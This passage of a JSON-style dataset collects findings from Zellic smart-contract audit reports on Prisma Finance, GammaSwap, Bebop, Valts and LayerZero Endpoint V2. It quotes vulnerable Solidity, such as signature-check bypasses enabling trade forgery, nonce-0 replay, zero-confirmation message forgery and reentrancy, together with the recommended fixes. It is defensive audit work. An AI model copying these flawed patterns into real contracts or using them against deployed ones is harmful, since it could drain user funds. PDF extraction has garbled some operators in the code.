commits fb6391a8 and ca3bcf51. Zellic Prisma Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Prisma Finance - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Unhandled return value of collateral transfer", + "labels": [ + "Zellic" + ], + "body": "Target: TroveManager, StabilityPool, BorrowerOperations Category: Coding Mistakes Likelihood: N/A Severity: Informational : Informational Certain tokens, such as USDT, do not correctly implement the EIP-20 standard. Their t ransfer and transferFrom functions return void instead of a successful boolean. Con- sequently, calling these functions with the expected EIP-20 function signatures will always result in a revert. The documentation states that only the listed collateral tokens are supported. How- ever, if the protocol were to later support these nonstandard tokens, it could lead to issues with certain function calls that rely on transfer/transferFrom returning a boolean value. Nonstandard collateral tokens might not work as intended. Consider using OpenZeppelin\u2019s safeTransferFrom()/safeTransfer() method instead of transferFrom()/transfer(). This will ensure that the transfers are handled safely and prevent any unexpected reverts related to nonstandard tokens. This issue has been acknowledged by Prisma Finance, and a fix was implemented in commit 039cc86a. Zellic Prisma Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Prisma Finance - Zellic Audit Report.pdf" + }, + { + "title": "4.1 Module: ExternalLiquidationStrategy.sol Function: _liquidateExternally(uint256 tokenId, uint128[] amounts, uint 256 lpTokens, address to, byte[] data) Allows any caller to liquidate the existing loan using a flash loan of collateral tokens from the pool and/or CFMM LP tokens. Before the liquidation, the externalSwap func- tion will be called. After that, a check will be made that enough tokens have been deposited. Allows only full liquidation of the loan. Inputs", + "labels": [ + "Zellic" + ], + "body": "tokenId \u2013 Validation: There is no verification that the corresponding _loan for this tokenId exists. \u2013 : A tokenId referring to an existing _loan. Not necessary msg.sender is owner of _loan, so the caller can choose any existing loan. amounts \u2013 Validation: There is a check that amount <= s.TOKEN_BALANCE inside externa lSwap->sendAndCalcCollateralLPTokens->sendToken function. \u2013 : Amount of tokens from the pool to flash loan. lpTokens \u2013 Validation: There is a check that lpTokens <= s.LP_TOKEN_BALANCE inside ex ternalSwap->sendCFMMLPTokens->sendToken function \u2013 : Amount of CFMM LP tokens being flash loaned. to \u2013 Validation: Cannot be zero address. \u2013 : Address that will receive the collateral tokens and/or lpTokens in flash loan. Zellic GammaSwap data \u2013 Validation: No checks. \u2013 : Custom user data. It is passed to the externalCall. Branches and code coverage (including function calls) The part of _liquidateExternally tests are skipped. Intended branches \u25a1 Check that loan was fully liquidated Negative behavior 4\u25a1 _loan for tokenId does not exist. \u25a1 Balance of contract not enough to transfer amounts. \u25a1 Balance of contract not enough to transfer lpTokens. \u25a1 Zero to address. 4\u25a1 After externalCall the s.cfmm balance of contract has not returned to the pre- vious value. \u25a1 After externalCall the balance of contract for each tokens has not returned to the previous value. Function call analysis externalSwap(_loan, s.cfmm, amounts, lpTokens, to, data) -> sendAndCalcCo llateralLPTokens(to, amounts, lastCFMMTotalSupply) -> sendToken(IERC20(to kens[i]), to, amounts[i], s.TOKEN_BALANCE[i], type(uint128).max) -> Gamma SwapLibrary.safeTransfer(token, to, amount) \u2013 External/Internal? External. \u2013 Argument control? to and amount. \u2013 : The caller can transfer any number of tokens that is less than s.TO KEN_BALANCE[i], but they must return the same or a larger amount after the externalCall function call; it will be checked inside the updateCollateral function. externalSwap(_loan, s.cfmm, amounts, lpTokens, to, data) -> sendCFMMLPTok ens(_cfmm, to, lpTokens) -> sendToken(IERC20(_cfmm), to, lpTokens, s.LP_T OKEN_BALANCE, type(uint256).max) -> GammaSwapLibrary.safeTransfer(token, t o, amount) \u2013 External/Internal? External. \u2013 Argument control? to and amount. \u2013 : The caller can transfer any number of tokens that is less than s. LP_TOKEN_BALANCE, but they must return the same or a larger amount after Zellic GammaSwap the externalCall function call; it will be checked inside the payLoanAndRef undLiquidator function. externalSwap(_loan, s.cfmm, amounts, lpTokens, to, data) -> IExternalCall ee(to).externalCall(msg.sender, amounts, lpTokens, data); \u2013 External/Internal? External. \u2013 Argument control? msg.sender, amounts, lpTokens, and data. \u2013 : The reentrancy is not possible because the other important exter- nal functions have lock. If caller does not return enough amount of tokens, the transaction will be reverted. externalSwap(_loan, s.cfmm, amounts, lpTokens, to, data) -> updateCollate ral(_loan) -> GammaSwapLibrary.balanceOf(IERC20(tokens[i]), address(this) ); -> address(_token).staticcall(abi.encodeWithSelector(_token.balanceOf. selector, _address)) \u2013 : Return the current token balance of this contract. This balance will be compared with the last tokenBalance[i] value; if the balance was in- creased, the _loan.tokensHeld and s.TOKEN_BALANCE will be increased too. But if the balance was decreased, the withdrawn value will be checked that it is no more than tokensHeld[i] (available collateral) and the _loan.t okensHeld and s.TOKEN_BALANCE will be increased. payLoanAndRefundLiquidator(tokenId, tokensHeld, loanLiquidity, 0, true) - > GammaSwapLibrary.safeTransfer(IERC20(s.cfmm), msg.sender, lpRefund); \u2013 External/Internal? External. \u2013 Argument control? No. \u2013 : The user should not control the lpRefund value. Transfer the re- maining part of CFMMLPTokens.", + "html_url": "https://github.com/Zellic/publications/blob/master/GammaSwap - Zellic Audit Report.pdf" + }, + { + "title": "4.2 Module: ExternalLongStrategy.sol Function: _rebalanceExternally(uint256 tokenId, uint128[] amounts, uint 256 lpTokens, address to, byte[] data) Allows the loan\u2019s creator to use a flash loan and also rebalance a loan\u2019s collateral. Inputs", + "labels": [ + "Zellic" + ], + "body": "tokenId \u2013 Validation: There is a check inside the _getLoan function that msg.sender is creator of loan. \u2013 : A tokenId refers to an existing _loan, which will be rebalancing. amounts Zellic GammaSwap \u2013 Validation: There is a check that amount <= s.TOKEN_BALANCE inside externa lSwap->sendAndCalcCollateralLPTokens->sendToken function. \u2013 : Amount of tokens from the pool to flash loan. lpTokens \u2013 Validation: There is a check that lpTokens <= s.LP_TOKEN_BALANCE inside ex ternalSwap->sendCFMMLPTokens->sendToken function. \u2013 : Amount of CFMM LP tokens being flash loaned. to \u2013 Validation: Cannot be zero address. \u2013 : Address that will receive the collateral tokens and/or lpTokens in flash loan. data \u2013 Validation: No checks. \u2013 : Custom user data. It is passed to the externalCall. Branches and code coverage (including function calls) Intended branches 4\u25a1 lpTokens !) 0. \u25a1 amounts is not empty. 4\u25a1 amounts is not empty and lpTokens !) 0. 4\u25a1 Withdraw one of the tokens by no more than the available number of tokens. 4\u25a1 Withdraw both tokens by no more than the available number of tokens. 4\u25a1 Deposit one of the tokens. 4\u25a1 Deposit both tokens. 4\u25a1 Deposit one token and withdraw another. Negative behavior 4\u25a1 _loan for tokenId does not exist. \u25a1 msg.sender is not creator of the _loan. \u25a1 Balance of contract is not enough to transfer amounts. \u25a1 Balance of contract is not enough to transfer lpTokens. \u25a1 Zero to address. \u25a1 After externalCall, the s.cfmm balance of the contract has not returned to the previous value. \u25a1 After externalCall, the balance of the contract for each tokens has not returned to the previous value. \u25a1 After externalCall, the balance of the contract for one of tokens has not re- turned to the previous value. Zellic GammaSwap 4\u25a1 Withdraw one of the tokens, and loan is undercollateralized after externalCall. 4\u25a1 Withdraw both tokens, and loan is undercollateralized after externalCall. 4\u25a1 Withdraw one of the tokens and deposit another, and loan is undercollateralized after externalCall. \u25a1 The amounts and tokenId are zero. Function call analysis externalSwap(_loan, s.cfmm, amounts, lpTokens, to, data) -> sendAndCalcCo llateralLPTokens(to, amounts, lastCFMMTotalSupply) -> sendToken(IERC20(to kens[i]), to, amounts[i], s.TOKEN_BALANCE[i], type(uint128).max) -> Gamma SwapLibrary.safeTransfer(token, to, amount) \u2013 External/Internal? External. \u2013 Argument control? to and amount. \u2013 : The caller can transfer any number of tokens that is less than s.TO KEN_BALANCE[i], but they must return the same or a larger amount after the externalCall function call; it will be checked inside the updateCollateral function. externalSwap(_loan, s.cfmm, amounts, lpTokens, to, data) -> sendCFMMLPTok ens(_cfmm, to, lpTokens) -> sendToken(IERC20(_cfmm), to, lpTokens, s.LP_T OKEN_BALANCE, type(uint256).max) -> GammaSwapLibrary.safeTransfer(token, t o, amount) \u2013 External/Internal? External. \u2013 Argument control? to and amount. \u2013 : The caller can transfer any number of tokens that is less than s. LP_TOKEN_BALANCE, but they must return the same or a larger amount after the externalCall function call; it will be checked inside the checkLPTokens function. externalSwap(_loan, s.cfmm, amounts, lpTokens, to, data) -> IExternalCall ee(to).externalCall(msg.sender, amounts, lpTokens, data); \u2013 External/Internal? External. \u2013 Argument control? msg.sender, amounts, lpTokens, and data. \u2013 : The reentrancy is not possible because the other important exter- nal functions have lock. If caller does not return enough amount of tokens, the transaction will be reverted. externalSwap(_loan, s.cfmm, amounts, lpTokens, to, data) -> updateCollate ral(_loan) -> GammaSwapLibrary.balanceOf(IERC20(tokens[i]), address(this) ); -> address(_token).staticcall(abi.encodeWithSelector(_token.balanceOf. selector, _address)) \u2013 External/Internal? External. Zellic GammaSwap \u2013 Argument control? No. \u2013 : Return the current token balance of this contract. This balance will be compared with the last tokenBalance[i] value; if the balance was in- creased, the _loan.tokensHeld and s.TOKEN_BALANCE will be increased too. But if the balance was decreased, the withdrawn value will be checked that it is no more than tokensHeld[i] (available collateral) and the _loan.t okensHeld and s.TOKEN_BALANCE will be increased. externalSwap(_loan, s.cfmm, amounts, lpTokens, to, data) -> checkLPTokens (_cfmm, prevLpTokenBalance, lastCFMMInvariant, lastCFMMTotalSupply) -> Ga mmaSwapLibrary.balanceOf(IERC20(_cfmm), address(this)) \u2013 External/Internal? External. \u2013 Argument control? No. \u2013 : Return the current _cfmm balance of this contract. This new balance will be compared with the balance before the externalCall function call, and if new value is less, the transaction will be reverted. Also, update the s.LP_TOKEN_BALANCE and s.LP_INVARIANT. Zellic GammaSwap 5 Audit Results At the time of our audit, the code was not deployed to mainnet EVM. During our audit, we discovered one finding that was informational in nature. Gam- maSwap acknowledged the finding and implemented a fix.", + "html_url": "https://github.com/Zellic/publications/blob/master/GammaSwap - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Arbitrary trade forgery", + "labels": [ + "Zellic" + ], + "body": "Target: bebop_aggregation_contract Category: Business Logic Likelihood: High Severity: Critical : Critical A malicious user can forge an arbitrary trade including any trader. function validateMakerSignature( address maker_address, bytes32 hash, Signature memory signature ) public view override{ ...)) } else if (signature.signatureType =) SignatureType.EIP1271) { require(IERC1271(signature.walletAddress).isValidSignature(hash, signature.signatureBytes) =) EIP1271_MAGICVALUE, \u201cInvalid Maker EIP 1271 Signature\u201d); ...)) } This is caused by the user-supplied maker signatures, which can be set to EIP1271 sig- natures, verified against a user-supplied wallet address that has to return a valid value. However, there is nothing that binds the maker addresses to the wallet addresses. As a result, a user can supply an arbitrary maker address and a wallet address that will always return the correct value to pass signature checks. A malicious user can forge extremely unbalanced one-sided trades to steal funds from any user (market maker or taker) that has approval to the Bebop contract. Bind the wallet address to the maker address or use the maker address as the wallet address. Zellic Bebop The issue has been fixed in commit ce63364f. Zellic Bebop", + "html_url": "https://github.com/Zellic/publications/blob/master/Bebop - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Any order can be blocked permanently", + "labels": [ + "Zellic" + ], + "body": "Target: bebop_aggregation_contract Category: Business Logic Likelihood: Medium Severity: Medium : Medium /) Construct partial orders from aggregated orders function assertAndInvalidateAggregateOrder( AggregateOrder memory order, bytes memory takerSig, Signature[] memory makerSigs ) public override returns (bytes32) { The public function assertAndInvalidateAggregateOrder checks the validity of an or- der, but in doing so it also sets the nonce of that order. This function should be called by SettleAggregateOrder after which the trade is executed. If called alone, it will set the nonce of that specific trade, and as a result, that order cannot be used since the nonce will be set. A user can block any person\u2019s call to SettleAggregateOrder by calling assertAndInval idateAggregateOrder first. Change the visibility of assertAndInvalidateAggregateOrder to internal. The issue has been fixed in commit fa724361. Zellic Bebop", + "html_url": "https://github.com/Zellic/publications/blob/master/Bebop - Zellic Audit Report.pdf" + }, + { + "title": "3.3 A nonce of 0 can result in signature replay attacks", + "labels": [ + "Zellic" + ], + "body": "Target: bebop_aggregation_contract Category: Business Logic Likelihood: Low Severity: Low : Low The function invalidateOrder is responsible for checking and setting nonces in a gas- efficient manner; it does so by checking a certain slot, and if the slot is not 0, the nonce has been used. function invalidateOrder(address maker, uint256 nonce) private { uint256 invalidatorSlot = uint64(nonce) >) 8; uint256 invalidatorBit = 1 <) uint8(nonce); mapping(uint256 => uint256) storage invalidatorStorage = maker_validator[maker]; uint256 invalidator = invalidatorStorage[invalidatorSlot]; require(invalidator & invalidatorBit =) 0, \u201cInvalid maker order (nonce)\u201d); invalidatorStorage[invalidatorSlot] = invalidator | invalidatorBit; } However, the specific nonce 0 will always pass this check. If the nonce 0 was chosen as the nonce to use, signature replay attacks could be possible, causing loss of funds for either a market maker or taker. Enforce that the nonce supplied is never 0. The issue has been fixed in commit e4aa345b. Zellic Bebop", + "html_url": "https://github.com/Zellic/publications/blob/master/Bebop - Zellic Audit Report.pdf" + }, + { + "title": "3.4 The signature may be too short", + "labels": [ + "Zellic" + ], + "body": "Target: bebop_aggregation_contract Category: Coding Mistakes Likelihood: Low Severity: Low : Low There are no checks on the signature length in the getRsv function. This function is responsible for extracting the r/s/v values from a signature. The function is defined as follows: function getRsv(bytes memory sig) internal pure returns (bytes32, bytes32, uint8) { bytes32 r; bytes32 s; uint8 v; assembly { r :) mload(add(sig, 32)) s :) mload(add(sig, 64)) v :) and(mload(add(sig, 65)), 255) } if (v < 27) v += 27; return (r, s, v); } In case the signature is shorter than 65 bytes, the r/s will be padded with zeroes, which could lead to undesired behavior. The impact of this issue is low, as the function is only used to extract the r/s/v values from a signature. The function is not used to verify the signature itself, which is done by the ecrecover function. We recommend adding a check that ensures the signature is 65 bytes long. Zellic Bebop function getRsv(bytes memory sig) internal pure returns (bytes32, bytes32, uint8) { require(sig.length >) 65, \u201cSignature too short\u201d); bytes32 r; bytes32 s; uint8 v; assembly { r :) mload(add(sig, 32)) s :) mload(add(sig, 64)) v :) and(mload(add(sig, 65)), 255) } if (v < 27) v += 27; return (r, s, v); } The issue has been fixed in commit ba4a5804. Zellic Bebop", + "html_url": "https://github.com/Zellic/publications/blob/master/Bebop - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Unnecessary use of the receive() function", + "labels": [ + "Zellic" + ], + "body": "Target: valts.sol Category: Coding Mistakes Likelihood: Low Severity: Low : Low The receive() function is typically used when the contract is supposed to receive ETH. In this case, the contract is expected not to receive any ETH, and for that reason, a revert is put in place so that it does not happen. receive () external payable { revert(); } We recommend removing the receive() function altogether, such that no ETH can be manually transferred by an EOA to the contract. The issue has been fixed in commit 2124d1a. Zellic Valts", + "html_url": "https://github.com/Zellic/publications/blob/master/Valts - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Inconsistent usage of modifiers", + "labels": [ + "Zellic" + ], + "body": "Target: valts.sol, Valts1155.sol Category: Coding Mistakes Likelihood: N/A Severity: Informational : N/A In wipeApproval, the onlyRole(OWNER_ROLE) can be enforced over the current require statement. function wipeApproval(ApprovalType approvalType, address to, uint256 amount) external { require(hasRole(OWNER_ROLE, msg.sender), \u201cOwner required\u201d); cleanupApproval(makeKey(approvalType, to, amount)); } We recommend using the onlyRole modifier. function wipeApproval(ApprovalType approvalType, address to, uint256 amount) external onlyRole(OWNER_ROLE) { cleanupApproval(makeKey(approvalType, to, amount)); } The issue has been fixed in commits 8bbb42b and 2124d1a. Zellic Valts", + "html_url": "https://github.com/Zellic/publications/blob/master/Valts - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Role checks are redundant", + "labels": [ + "Zellic" + ], + "body": "Target: Valts1155.sol Category: Coding Mistakes Likelihood: N/A Severity: Informational : N/A In remminter and addminter, there is a check on whether the account whose role is about to be changed actually has that role or not. The check does not need to be per- formed at the function level, since _revokeRole and _grantRole perform the necessary checks and reverts in the case those fail. function remminter(address account) external onlyRole(OWNER_ROLE) { require(hasRole(MINTER_ROLE, account), \u201cNot a minter\u201d); _revokeRole(MINTER_ROLE, account); } function addminter(address account) external onlyRole(OWNER_ROLE) { require(!hasRole(MINTER_ROLE, account), \u201cAlready a minter\u201d); _grantRole(MINTER_ROLE, account); } We recommend removing the require statements. function remminter(address account) external onlyRole(OWNER_ROLE) { _revokeRole(MINTER_ROLE, account); } function addminter(address account) external onlyRole(OWNER_ROLE) { _grantRole(MINTER_ROLE, account); } The issue has been fixed in commit 8bbb42b. Zellic Valts", + "html_url": "https://github.com/Zellic/publications/blob/master/Valts - Zellic Audit Report.pdf" + }, + { + "title": "4.1 Zero confirmations lead to arbitrary payload execution", + "labels": [ + "Zellic" + ], + "body": "Target: ReceiveUlnBase Category: Coding Mistakes Likelihood: High Severity: Critical : Critical The OApp can configure requiredConfirmations to 0 on the receiving side to allow quicker message delivery. This should be okay as long as the OApp understands the risk of 0 confirmation transactions. function _verified( address _dvn, bytes32 _headerHash, bytes32 _payloadHash, uint64 _requiredConfirmation ) internal returns (bool verified) { uint64 confirmations = hashLookup[_headerHash][_payloadHash][_dvn]; /) return true if the dvn has signed enough confirmations verified = confirmations >) _requiredConfirmation; delete hashLookup[_headerHash][_payloadHash][_dvn]; } There exists an edge case in _verified where the confirmations default to 0 on an empty slot, so the verified is always true. This would allow complete forgery of messages as every message would be consid- ered valid. We would recommend storing a flag along with confirmations in hashLookup. This would prevent the default value of 0 to be considered valid number of confirmations. Zellic LayerZero Labs This issue has been acknowledged by LayerZero Labs, and a fix was implemented in commit 32981204. Zellic LayerZero Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/LayerZero Endpoint V2 - Zellic Audit Report.pdf" + }, + { + "title": "4.2 Overlapping DVNs may lead to unverifable messages", + "labels": [ + "Zellic" + ], + "body": "Target: ReceiveUlnBase Category: Coding Mistakes Likelihood: Low Severity: Medium : Low To optimize for gas refunds, confirmations are deleted from hashLookup after being read. function _verified( address _dvn, bytes32 _headerHash, bytes32 _payloadHash, uint64 _requiredConfirmation ) internal returns (bool verified) { uint64 confirmations = hashLookup[_headerHash][_payloadHash][_dvn]; /) return true if the dvn has signed enough confirmations verified = confirmations >) _requiredConfirmation; delete hashLookup[_headerHash][_payloadHash][_dvn]; } In the scenario where a DVN is part both the required DVNs and optional DVNs, the confirmations from the DVN will be falsely deleted before they\u2019re read. This will cause the DVNs confirmation to not count as part of the optional DVN threshold. Messages that should\u2019ve been verifiable are falsely not verified. We would recommend deleting the confirmations after the optional DVN lookup. This issue has been acknowledged by LayerZero Labs, and a fix was implemented in commit 03244a85. Zellic LayerZero Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/LayerZero Endpoint V2 - Zellic Audit Report.pdf" + }, + { + "title": "4.3 Potential reentrancy in lzReceive function", + "labels": [ + "Zellic" + ], + "body": "Target: EndpointV2 Category: Coding Mistakes Likelihood: Low Severity: Low : Low The lzReceive function deletes the payload hash prior to executing a delivered mes- sage to the receiver, thereby mitigating the risk of a reentrancy attack. In instances where message delivery fails, the hash is reinstated for resending. Subsequently, an external call is made to refund the native fee to the caller. function lzReceive( Origin calldata _origin, address _receiver, bytes32 _guid, bytes calldata _message, bytes calldata _extraData ) external payable returns (bool success, bytes memory reason) { /) clear the payload first to prevent reentrancy, and then execute the message bytes32 payloadHash = _clearPayload(_origin, _receiver, abi.encodePacked(_guid, _message)); (success, reason) = _safeCallLzReceive(_origin, _receiver, _guid, _message, _extraData); if (success) { emit PacketReceived(_origin, _receiver); } else { /) if the message fails, revert the clearing of the payload _inbound(_origin, _receiver, payloadHash); /) refund the native fee if the message fails to prevent the loss of fund if (msg.value > 0) { (bool sent, ) = msg.sender.call{value: msg.value}(\u201d\u201d); require(sent, Errors.INVALID_STATE); } emit LzReceiveFailed(_origin, _receiver, reason); } Zellic LayerZero Labs } During this second external call, the caller may reenter and execute the message cor- rectly, as the payloadHash has been restored prior to this call. Initially, the PacketReceived event will be emitted following successful execution. However, the LzReceiveFailed event will also be emitted for the same packet within the same transaction, but in an incorrect order. Restore the hash after the external call: function lzReceive( Origin calldata _origin, address _receiver, bytes32 _guid, bytes calldata _message, bytes calldata _extraData ) external payable returns (bool success, bytes memory reason) { /) clear the payload first to prevent reentrancy, and then execute the message bytes32 payloadHash = _clearPayload(_origin, _receiver, abi.encodePacked(_guid, _message)); (success, reason) = _safeCallLzReceive(_origin, _receiver, _guid, _message, _extraData); if (success) { emit PacketReceived(_origin, _receiver); } else { /) if the message fails, revert the clearing of the payload _inbound(_origin, _receiver, payloadHash); /) refund the native fee if the message fails to prevent the loss of fund if (msg.value > 0) { (bool sent, ) = msg.sender.call{value: msg.value}(\u201d\u201d); require(sent, Errors.INVALID_STATE); } Zellic LayerZero Labs /) if the message fails, revert the clearing of the payload _inbound(_origin, _receiver, payloadHash); emit LzReceiveFailed(_origin, _receiver, reason); } } This issue has been acknowledged by LayerZero Labs, and a fix was implemented in commit 6ce8d31c. Zellic LayerZero Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/LayerZero Endpoint V2 - Zellic Audit Report.pdf" + }, + { + "title": "4.4 Potential reentrancy in lzCompose function", + "labels": [ + "Zellic" + ], + "body": "Target: MessagingComposer Category: Coding Mistakes Likelihood: Low Severity: Low : Low The lzCompose function deletes the composed message hash prior to executing a mes- sage to the composer, thereby mitigating the risk of a reentrancy attack. In instances where message delivery fails, the hash is reinstated for resending. Subsequently, an external call is made to refund the native fee to the caller. function lzCompose( address _sender, address _composer, bytes32 _guid, bytes calldata _message, bytes calldata _extraData ) external payable returns (bool success, bytes memory reason) { ...)) composedMessages[_sender][_composer][_guid] = _RECEIVED_MESSAGE_HASH; { bytes memory callData = abi.encodeWithSelector( ILayerZeroComposer.lzCompose.selector, _sender, _guid, _message, msg.sender, _extraData ); (success, reason) = _composer.safeCall(gasleft(), msg.value, callData); } if (success) { emit ComposedMessageReceived(_sender, _composer, _guid, expectedHash, msg.sender); } else { /) if the message fails, revert the state composedMessages[_sender][_composer][_guid] = expectedHash; Zellic LayerZero Labs /) refund the native fee if the message fails to prevent the loss of fund if (msg.value > 0) { (bool sent, ) = msg.sender.call{value: msg.value}(\u201d\u201d); require(sent, Errors.INVALID_STATE); } emit LzComposeFailed(_sender, _composer, _guid, expectedHash, msg.sender, reason); } } } During this second external call, the caller may reenter and execute the message cor- rectly, as the composedMessages has been restored prior to this call. Initially, the ComposedMessageReceived event will be emitted following successful exe- cution. However, the LzComposeFailed event will also be emitted for the same packet within the same transaction, but in an incorrect order. Restore the hash after the external call: function lzCompose( address _sender, address _composer, bytes32 _guid, bytes calldata _message, bytes calldata _extraData ) external payable returns (bool success, bytes memory reason) { ...)) composedMessages[_sender][_composer][_guid] = _RECEIVED_MESSAGE_HASH; ...)) if (success) { emit ComposedMessageReceived(_sender, _composer, _guid, expectedHash, msg.sender); } else { /) if the message fails, revert the state Zellic LayerZero Labs composedMessages[_sender][_composer][_guid] = expectedHash; /) refund the native fee if the message fails to prevent the loss of fund if (msg.value > 0) { (bool sent, ) = msg.sender.call{value: msg.value}(\u201d\u201d); require(sent, Errors.INVALID_STATE); } /) if the message fails, revert the state composedMessages[_sender][_composer][_guid] = expectedHash; emit LzComposeFailed(_sender, _composer, _guid, expectedHash, msg.sender, reason); } } } This issue has been acknowledged by LayerZero Labs, and a fix was implemented in commit 6ce8d31c. Zellic LayerZero Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/LayerZero Endpoint V2 - Zellic Audit Report.pdf" + }, + { + "title": "4.5 Potential replay across chains", + "labels": [ + "Zellic" + ], + "body": "Target: VerifierNetwork Category: Business Logic Likelihood: Low Severity: Low : Low As LayerZero is a cross-chain application, VerifierNetwork might be deployed across multiple chains. There exists a possibility of message replay if signers are shared be- tween multiple instances of VerifierNetwork. This is because there is no unique iden- tifier pinning the VerifierNetwork the message can be executed at. A message can be replayed between instances of VerifierNetwork if the signers/quo- rum is shared. As the signed message includes the target address, calls to onlySelf(orAdmin) func- tions cannot be replayed. Furthermore, calls to ULN functions such as verify would not be useful to an attacker as well. Add an identifier to VerifierNetwork that is checked as part of the signature. LayerZero labs acknowled the issue and has fixed it in commit 175c08bd Zellic LayerZero Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/LayerZero Endpoint V2 - Zellic Audit Report.pdf" + }, + { + "title": "4.6 Re-execution of instructions is blocked if a signature verifi- cation failed", + "labels": [ + "Zellic" + ], + "body": "Target: VerifierNetwork Category: Business Logic Likelihood: Medium Severity: Medium : Medium The execute function is designed to process a sequence of instructions, executing them in the specified order. If any instruction fail during this process, the function will emit the ExecuteFailed event and proceed with the execution of the next instruc- tions. The usedHashes array is used to prevent reentrancy and replay attacks. If the hash of an instruction is identified as already used during the execution process, the HashAlreadyUsed event is emitted, and the function moves on to the next instruction. In cases where the hash is not previously marked as used, it will be marked and sig- nature verification will be conducted. Upon successful verification, an external call is initiated to execute it. But the execution of an instruction fails, usedHashes is reset, allowing for the possibility of re-execution. However, if signature validation fails, the instruction is still marked as used. Consequently, instructions that are marked as used but fail signature validation are blocked from being re-attempted for execution. function execute(ExecuteParam[] calldata _params) external onlyRole(ADMIN_ROLE) { for (uint i = 0; i < _params.length; +)i) { ExecuteParam calldata param = _params[i]; ...)) /) 2. skip if hash used bool shouldCheckHash = _shouldCheckHash(bytes4(param.callData)); if (shouldCheckHash) { if (usedHashes[hash]) { emit HashAlreadyUsed(param, hash); continue; Zellic LayerZero Labs } else { usedHashes[hash] = true; /) prevent reentry and replay attack } } /) 3. check signatures if (verifySignatures(hash, param.signatures)) { /) execute call data (bool success, bytes memory rtnData) = param.target.call(param.callData); if (!success) { if (shouldCheckHash) { usedHashes[hash] = false; emit ExecuteFailed(i, rtnData); } } } else { if (shouldCheckHash) { usedHashes[hash] = false; } emit VerifySignaturesFailed(i); } } } This issue has been acknowledged by LayerZero Labs, and a fix was implemented in commit 3bb3e16d. Zellic LayerZero Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/LayerZero Endpoint V2 - Zellic Audit Report.pdf" + }, + { + "title": "4.7 SafeCall does not check that target is contract", + "labels": [ + "Zellic" + ], + "body": "Target: SafeCall Category: Business Logic Likelihood: Low Severity: Medium : Medium The function safeCall is used to call the _target contract with a specified gas limit and value and captures the return data. But at the same time, there is no verification that the address is really a contract. If the _target address is not a contract, the call will be successful although the function call has not actually been made. We recommend adding a check that ensures the _target has a code. function safeCall( address _target, uint256 _gas, uint256 _value, bytes memory _calldata ) internal returns (bool, bytes memory) { uint size; assembly { size :) extcodesize(_target) } if (size =) 0) { return (false, bytes(string(\u201dno code!\u201d))); } /) set up for assembly call uint256 _toCopy; bool _success; ...)) } Zellic LayerZero Labs This issue has been acknowledged by LayerZero Labs, and a fix was implemented in commit 0d04db22. Zellic LayerZero Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/LayerZero Endpoint V2 - Zellic Audit Report.pdf" + }, + { + "title": "4.8 Potential reentrancy through execute function", + "labels": [ + "Zellic" + ], + "body": "Target: VerifierNetwork Category: Coding Mistakes Likelihood: Medium Severity: Low : Low The execute function takes an array of ExecuteParam. For each of the parameters, it verifies the signatures, executes the callData, and stores its hash (if the call is suc- cessful) to prevent replay: /) 2. skip if hash used bool shouldCheckHash = _shouldCheckHash(bytes4(param.callData)); if (shouldCheckHash &) usedHashes[hash]) { emit HashAlreadyUsed(param, hash); continue; } /) 3. check signatures if (verifySignatures(hash, param.signatures)) { /) execute call data (bool success, bytes memory rtnData) = param.target.call(param.callData); if (success) { if (shouldCheckHash) { /) store usedHash only on success usedHashes[hash] = true; /) prevent reentry and replay attack } } else { emit ExecuteFailed(i, rtnData); } } The call can be made more than once for one signature if the execute function reenters during the external call since the hash is not stored before the external call. Though unlikely to be exploited, there is the potential for unexpected behavior be- cause the function does not sufficiently prevent reentrancy attacks. Zellic LayerZero Labs Store the hash before the external call: /) 2. skip if hash used bool shouldCheckHash = _shouldCheckHash(bytes4(param.callData)); if (shouldCheckHash &) usedHashes[hash]) { emit HashAlreadyUsed(param, hash); continue; } /) 3. check signatures if (verifySignatures(hash, param.signatures)) { usedHashes[hash] = shouldCheckHash; /) prevent reentry and replay /) execute call data (bool success, bytes memory rtnData) = param.target.call(param.callData); if (success) { if (shouldCheckHash) { /) store usedHash only on success usedHashes[hash] = true; /) prevent reentry and replay attack } } else { if (!success) { delete usedHashes[hash]; emit ExecuteFailed(i, rtnData); } } This issue has been acknowledged by LayerZero Labs. Zellic LayerZero Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/LayerZero Endpoint V2 - Zellic Audit Report.pdf" + }, + { + "title": "4.9 UlnConfig inconsistencies", + "labels": [ + "Zellic" + ], + "body": "Target: UlnConfig Category: Coding Mistakes Likelihood: Low Severity: Medium : Low There are a few inconsistencies in the UlnConfig code: For CONFIG_TYPE_VERIFIERS and CONFIG_TYPE_OPTIONAL_VERIFIERS, the config- setting code should only do assertions and assignments if !useCustomVerifiers or !useCustomOptionalVerifiers, respectively; otherwise, there are odd situa- tions where, for example, a specific custom verifiers config cannot be set be- cause UlnConfig thinks the custom optional verifiers will be used in the config, when in reality useCustomOptionalVerifiers is false. The _assertNoDuplicates function would be more useful if it would also assert no collisions between verifiers and optional verifiers (i.e., that there is no inter- section). More importantly, there is also a situation where there could be zero \u2014 or greater than the max uint8 \u2014 (required and optional) verifiers configured: \u2013 config.useCustomVerifiers = true \u2013 config.verifierCount = 0 \u2013 config.optionalVerifierThreshold = 1 \u2013 config.useCustomOptionalVerifiers = false \u2013 defaultConfig.optionalVerifierCount = 0 \u2013 other specific values required to set the above config This is due to the following code: function _assertVerifierList(uint32 _remoteEid, address _oapp) internal view { UlnConfigStruct memory config = getUlnConfig(_oapp, _remoteEid); /) it is possible for sender to configure nil verifiers require(config.verifierCount > 0 |) config.optionalVerifierThreshold > 0, Zellic LayerZero Labs Errors.VERIFIERS_UNAVAILABLE); /) verifier options restricts total verifiers to 255 require(config.verifierCount + config.optionalVerifierCount <) type(uint8).max, Errors.INVALID_SIZE); } It is possible to set invalid configuration in certain edge cases that may allow a mes- sage to pass with no confirmations. This situation is only achievable if 